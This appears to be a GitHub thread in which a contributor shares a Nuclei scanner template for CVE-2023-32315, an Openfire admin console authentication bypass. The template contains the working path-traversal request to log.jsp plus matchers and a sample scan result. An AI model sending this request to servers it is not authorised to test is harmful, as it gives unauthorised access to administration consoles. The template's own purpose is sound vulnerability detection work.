Administration Console authentication bypass in openfire xmppserver

[vsh00t]

Template Information:

An important security issue affects a range of versions of Openfire, the cross-platform real-time collaboration server based on the XMPP protocol that is created by the Ignite Realtime community.

reference:

• https://github.com/advisories/GHSA-gw42-f939-fhvm

Nuclei Template:

id: CVE-2023-32315

info:
  name: Administration Console authentication bypass in openfire xmppserver
  author: vsh00t
  severity: high
  description: |
    An important security issue affects a range of versions of Openfire, the cross-platform real-time collaboration server based on the XMPP protocol that is created by the Ignite Realtime community.
  remediation: The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0).
  reference:
    - https://github.com/advisories/GHSA-gw42-f939-fhvm
  classification:
    cve-id: CVE-2023-32315
  metadata:
    max-request: 2
    verified: "true"
  tags: authentication,bypass,cve,cve2023

http:
  - raw:
      - |+
        GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    unsafe: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "apache"
          - "java"
          - "openfire"
          - "jivesoftware"
        part: body
        condition: or

[CVE-2023-32315] [http] [high] http://IPADD:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

[DhiyaneshGeek]

Hi @vsh00t Thank you so much for sharing this template, i have raised a PR #7334 .

Cheers 🍻